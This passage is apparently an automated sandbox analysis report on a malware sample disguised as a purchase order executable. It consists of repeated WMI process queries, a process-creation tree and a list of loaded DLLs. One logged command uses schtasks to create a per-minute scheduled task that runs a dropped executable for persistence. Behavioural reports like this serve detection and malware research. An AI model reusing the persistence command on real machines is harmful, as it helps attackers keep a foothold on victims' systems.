                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: wscript.exe, 00000006.00000003.2278413527.00000000031AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'OM;.EX
                                Source: New PO - Supplier 0202AW-PER2.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile read: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe "C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe"
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe"
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 17084
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 14008
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbsJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeSection loaded: ntmarta.dllJump to behavior
